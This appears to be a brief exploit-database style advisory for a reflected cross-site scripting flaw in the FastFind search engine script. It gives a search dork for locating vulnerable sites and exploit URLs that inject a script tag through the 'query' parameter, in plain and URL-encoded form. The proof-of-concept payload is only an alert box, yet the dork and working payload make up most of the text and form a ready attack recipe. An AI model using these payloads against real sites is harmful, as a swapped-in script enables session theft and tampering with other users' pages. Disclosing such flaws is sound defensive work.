FastFind, a popular search engine script, suffers from a cross site scripting vulnerability.
f1db1bc006fd8a0164324d632851f81f09960b16cc54488567cc7c2197fb8625
XSS IN FastFind...
DORK:
"Powered by FastFind - Search Engine Script"
Exploit:
http://[target]/[path]/index.php?query=<script>alert(1)</script>&type=simple
references:
http://www.interspire.com/fastfind/
Example:
http://www.target.com/fastfind/index.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=simple
http://www.target.com/search/index.php?query=<script>alert(1)</script>&type=simple